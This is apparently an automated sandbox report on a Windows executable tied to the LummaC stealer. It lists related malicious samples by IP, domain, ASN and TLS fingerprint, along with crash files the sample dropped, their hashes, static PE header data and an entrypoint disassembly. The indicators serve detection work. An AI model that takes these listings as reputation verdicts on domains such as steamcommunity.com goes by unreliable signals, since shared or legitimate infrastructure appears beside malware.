	9pyUjy2elE.exe	Get hash	malicious	LummaC	Browse
	NQbg5Ht2hW.exe	Get hash	malicious	LummaC	Browse
	BZuk2UI1RC.exe	Get hash	malicious	LummaC	Browse
	EI3TafelpV.exe	Get hash	malicious	LummaC	Browse
	6S7hoBEHvr.exe	Get hash	malicious	LummaC	Browse
23.55.153.106	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse
	HK8IIasL9i.exe	Get hash	malicious	LummaC	Browse
	OGBLsboKIF.exe	Get hash	malicious	LummaC	Browse
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse
	5XXofntDiN.exe	Get hash	malicious	LummaC	Browse
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse
	5RjjCWZAVv.exe	Get hash	malicious	LummaC	Browse
	s31ydU1MpQ.exe	Get hash	malicious	LummaC, Stealc	Browse
	TmmiCE5Ulm.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	172.67.157.254
	LNn56KMkEE.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.66.86
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.157.254
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	HK8IIasL9i.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
steamcommunity.com	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.121.10.34
	2ZsJ2iP8Q2.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	LopCYSStr3.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	LNn56KMkEE.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	VBHyEN96Pw.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	104.102.49.254
	613vKYuY2S.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	YYjRtxS70h.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	7uJ95NO82G.exe	Get hash	malicious	LodaRAT	Browse	172.232.216.250
	nabx86.elf	Get hash	malicious	Unknown	Browse	23.7.216.65
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
	[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml	Get hash	malicious	Unknown	Browse	23.195.39.65
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	23.219.82.25
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	104.126.116.105
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HK8IIasL9i.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	OGBLsboKIF.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
CLOUDFLARENETUS	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.63.229
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	172.67.209.202
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.199.72
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	104.21.36.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254 23.55.153.106
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.157.254 23.55.153.106
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	J18uCKmoAw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.157.254 23.55.153.106
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	4W3cB5WEYH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.157.254 23.55.153.106
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_L5Kgf2Tvkc.exe_194eabfc38a1df46cf83de5de75aa03ad1fe3566_c09415c6_00ce0f5f-e7b6-4990-b793-4897f05e98ba\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0315848832806294
Encrypted:	false
SSDEEP:	96:Mxp1cOsOh51yLcDFQXIDcQWc6pcE8cw3Oa6+HbHg/wWGTf3hOyc45WAU6NCUtW2q:4rcOM0otma+jsFmezuiFKZ24IO8C
MD5:	D12F9B2F342297639E0FEAA26AD192FF
SHA1:	02D5225AD82B86683ACDCB9C5FAB2C22450304C7
SHA-256:	4370E9D5BFCB27DB93CA5992EEF8D66EB5516071D1EFB4A54A6BD87D1CB51640
SHA-512:	4C796EF9ACA5D3C774FC3B36DD9B1EE2074C1A27FF8130862B7905302E89B0FF120052DE86DF4108BC410D3FE8B38C57EFA5D94F28487D5895353B66AA18AE4D
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.0.8.3.9.6.9.5.2.7.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.0.8.4.0.0.5.4.6.4.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.c.e.0.f.5.f.-.e.7.b.6.-.4.9.9.0.-.b.7.9.3.-.4.8.9.7.f.0.5.e.9.8.b.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.e.d.e.c.3.4.-.e.f.4.b.-.4.e.8.0.-.b.3.9.4.-.b.9.6.a.a.2.7.e.e.1.5.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.5.K.g.f.2.T.v.k.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.4.-.3.9.7.b.-.d.7.e.5.d.9.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.b.5.f.f.a.a.b.e.f.8.1.0.2.0.5.2.e.3.2.8.3.a.4.5.2.2.4.8.e.e.a.0.0.0.0.f.f.f.f.!.0.0.0.0.1.d.e.3.e.b.4.9.b.2.6.5.4.1.4.4.7.0.e.2.d.b.a.8.1.2.3.1.4.3.6.f.3.e.f.0.8.f.b.6.!.L.5.K.g.f.2.T.v.k.c...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_L5Kgf2Tvkc.exe_194eabfc38a1df46cf83de5de75aa03ad1fe3566_c09415c6_299e7ad0-7baf-46f0-bc02-045ed09081d0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0276311283889334
Encrypted:	false
SSDEEP:	96:e8ie1c70sOh51yLcDFQXIDcQhgc6hTcEX6cw3X+HbHg/wWGTf3hOyc45WAU6NCUk:HXcIM04RgAjsFmezuiFKZ24IO8C
MD5:	85FD6161DDEB1B73D81C5711E904144D
SHA1:	2A416E800F5DED99140C9902C8630CDEDCC89734
SHA-256:	BCC386E235BD671E9CA5780CB721E5BC62B7CF7556A9A8FECD439C2412B32B2D
SHA-512:	02C9A587D8AFB7B0957E63288ECB4B31FF151B92C6AC465942A8D12C8E827F3049F13EF86750AE6AD0801FCCCB63FB3BE3750C7CB21FC53EF7E33BF6EDC3AFE0
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.0.8.3.8.2.8.0.8.2.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.9.e.7.a.d.0.-.7.b.a.f.-.4.6.f.0.-.b.c.0.2.-.0.4.5.e.d.0.9.0.8.1.d.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.f.9.f.0.2.-.a.e.7.4.-.4.3.b.9.-.8.7.c.b.-.9.5.5.f.7.2.7.7.f.1.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.5.K.g.f.2.T.v.k.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.4.-.3.9.7.b.-.d.7.e.5.d.9.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.b.5.f.f.a.a.b.e.f.8.1.0.2.0.5.2.e.3.2.8.3.a.4.5.2.2.4.8.e.e.a.0.0.0.0.f.f.f.f.!.0.0.0.0.1.d.e.3.e.b.4.9.b.2.6.5.4.1.4.4.7.0.e.2.d.b.a.8.1.2.3.1.4.3.6.f.3.e.f.0.8.f.b.6.!.L.5.K.g.f.2.T.v.k.c...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.1.2.:.0.2.:.3.9.:.5.3.!.0.!.L.5.K.g.f.2.T.v.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C26.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 24 08:00:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	57662
Entropy (8bit):	2.725592511467727
Encrypted:	false
SSDEEP:	384:yhE86G6nM7BpvbXpIkvVZt1KWQ2nxASP3VJwI7d7:yKHM7BpjXpvQ2xAmJwI7N
MD5:	A3F54EE4D66EBCD94C32017C0351945A
SHA1:	D35EE55A1B6E5AF44F86B36A74CABAA712CE993F
SHA-256:	85AA9C114F0A76C46BBAFD35936148A306A59338C5B6120A31F1AF7668C5EA7B
SHA-512:	C99ABF67BC295E648AD1F86A5C9F0047AACD742A03039C4342617771D2E46B91C014B806BFED3F8177926A2197F4BF70BF2B594BCF16411DE8E981BF60A7B1CD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......&jjg............4...............H............!...........2..........`.......8...........T...........@C...............!...........#..............................................................................eJ......p$......GenuineIntel............T............jjg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D8E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.6906533960014922
Encrypted:	false
SSDEEP:	192:R6l7wVeJC+6gP6Y97SU9SgqsGgmfZdJtOnpu989bAdsf3gm:R6lXJ76K6YBSU9SdgmfjJtOrAWfV
MD5:	8F5BB6A4E861B43680D2E2D3C139E051
SHA1:	03B172042C3BF9777FC4B9B3EF36CC8F2D72E48E
SHA-256:	A64D2BA3CF593690CEAE098792504880305B70EF95ECABF4168BC3E6EB3E1E3E
SHA-512:	6C5E2A1C54B5C02EC33DC4805A2FE2FAAC8F9BE8CED1393872EF29859AFCF4817D1701142CFAD1BF962B658CBDD50ACB868C4FE7B20DEAF5F297DFB1F0EF10A8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DBE.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4686
Entropy (8bit):	4.444089614343165
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9/0WpW8VYr5Ym8M4J8mFI5a+q8vmfE9n6z7Rd:uIjfEI7Zt7VAoJ0EK6bz7Rd
MD5:	C66473D218C118F3C3D8591311D2C1CB
SHA1:	CED7B5C90F958BE74882576724533DCE324E6C67
SHA-256:	016BF10A6DB93F003BCC549F78593B67ACFD70711AB12D5FB542707ECFBE81E2
SHA-512:	F162C51F1CD871158D68746DD4664F704D5F6D32B8BBDF93E821CA15F144F006060E0A769AAA7657FFC2EDB8D0E09D149CD6C2C74834DDADAAFC05EFD9DEAFFA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645063" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER81A4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 24 08:00:39 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	53886
Entropy (8bit):	2.7340696330817145
Encrypted:	false
SSDEEP:	192:dRJ2UXqlK86GbnOp1B9bvPkHVZWZJorIzL9BkneoZd7q5MMdPfbwklX3/yiUbqXh:LQE86Ga7B9bvPkHVZt1ekQM2cKX3/yOh
MD5:	1C38D5AAE693870A6DAD9B25113DD6DE
SHA1:	B10CD7C40CC0975634866EFB1797C11356EDDDC0
SHA-256:	628295632A445B9B2CC3230EEE642AD948BCB5CCBEEA3FAB2ABA84B4FF8D5AF5
SHA-512:	13953A2FD6FC6124877A26DDC2266E6D77693C9EB4056AAFDC0E5F5B95EC47501A0BAD62961D9223FF44DEC7BF9E91A9893FBF3A9DAC32D172FF1F6646B64692
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......'jjg............4...............H............!...........2..........`.......8...........T............C..f............!...........#..............................................................................eJ......p$......GenuineIntel............T............jjg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8232.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.6906083097261595
Encrypted:	false
SSDEEP:	192:R6l7wVeJCjc6e76Y9RSU9SgqsGgmfZdJtOzupDt89bJdsfTjm:R6lXJ0c6k6YrSU9SdgmfjJtONJWf2
MD5:	61B9E8A924DF6735E6BA0B583B339B4F
SHA1:	42687BF45BFC39C3B998C702141FE91AB1A6A81E
SHA-256:	440899920FBF665FE938EFD168927C6FFBF350CE84A02CFC8E7EC282702D2D79
SHA-512:	AC435928F4044A32A369DE73519FF39C7A79F2016C93B45A1217D7599598FC0755FAF2C404F4FB7A187042275439613709536B2F974C886A80341B8CBC2E565A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8252.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4686
Entropy (8bit):	4.441595503907506
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9/0WpW8VY6Ym8M4J8mFE+q8vmfE9n6z7Rd:uIjfEI7Zt7VaJYK6bz7Rd
MD5:	7AFA105701A76A6FBB9E89FED80036AB
SHA1:	E0C30639C3F49B0DE17468BB1E31C9991BC0D6E5
SHA-256:	7A7052ACE887013E3B5A98338B4DD4F1DD5C53CD1CA4F2A2F7743C37127BD089
SHA-512:	F5D553DA4693A8134F479E0A1A77C0CB8E47111941804E62EAC446CCE85D3353F1EEC27AB2B3B214DEB59CC3CB99397A1EFDC12E119F12DBF3BDB2520095F48F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645063" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465430727750291
Encrypted:	false
SSDEEP:	6144:fIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNQdwBCswSbs:QXD94+WlLZMM6YFHe+s
MD5:	5513A7A7C3D4D1A955F58FD7D43D50C2
SHA1:	817812549DE72E7C2EEBCDF4A4914BA6DC15CA63
SHA-256:	D20C08718CF8478B2B61ABD6962E7AED070A7F88855A72DA31706EB6FE352B48
SHA-512:	163C72D4F2D3940FD1B19CC0FB3DF66ED2D2AC5C2AF6F46E9225FD1925CAC83C6E9B056150C4B03B501341D254E2D48E2A9297C8F20D653F6C99F919D0CA81F9
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.ZI..U................................................................................................................................................................................................................................................................................................................................................^.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.320227375460195
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	L5Kgf2Tvkc.exe
File size:	298'496 bytes
MD5:	607558ab24e139b427bdc194ae34157c
SHA1:	1de3eb49b265414470e2dba81231436f3ef08fb6
SHA256:	fec5ed9fad03970d53ee85a1bca503497f08053a42c92955e60fabf0e320a71d
SHA512:	0e89d7ccfd64f159407a99fe13b7ce3e247df7bdbdc0bb55d6a4c5f09bc950049351fdaac215169f702ef8eb47cd60ac15932939f66a37a80076193e50ca6303
SSDEEP:	3072:nw1+Dsw2tx2uoL0FuwZAcA/enEwKHPapIAWg1JQXrKyIN0O/ARjhuaf0zNNxWSif:i+DsYL3bQnROupq2zNNxWFtv3W+Eh
TLSH:	8F54021135A0CC32C95764305525CBA16F7F753366B5DA877B682B3F6F202D24B3A38A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.;a9.U29.U29.U2'..2#.U2'..2..U2'..2..U2...2:.U29.T2E.U2'..28.U2'..28.U2'..28.U2Rich9.U2................PE..L....Uce...........

File Icon


Icon Hash:	07646dc7a3d16905

Static PE Info

General

Entrypoint:	0x4049b3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6563551D [Sun Nov 26 14:24:29 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	6c2a4d9e92f7bd76f57f059c1bbce328

Entrypoint Preview

Instruction
call 00007F849CE3EFDEh
jmp 00007F849CE39B0Dh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F849CE38E23h
mov dword ptr [esi], 00401290h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 00401290h
jmp 00007F849CE38ED8h
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 00401290h
call 00007F849CE38EC5h
test byte ptr [ebp+08h], 00000001h
je 00007F849CE39C99h
push esi
call 00007F849CE39477h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007F849CE39CD9h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007F849CE39CD1h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007F849CE39CA6h
add ecx, 08h
push ecx
push edx
call 00007F849CE3DB8Bh
pop ecx
pop ecx
test eax, eax
je 00007F849CE39C96h
xor eax, eax
jmp 00007F849CE39CB6h
test byte ptr [esi], 00000002h
je 00007F849CE39C97h
test byte ptr [edi], 00000008h
je 00007F849CE39C84h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007F849CE39C97h
test byte ptr [edi], 00000001h
je 00007F849CE39C76h
test al, 02h
je 00007F849CE39C97h
test byte ptr [edi], 00000002h
je 00007F849CE39C6Dh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3f5d8	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4b000	0x39d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
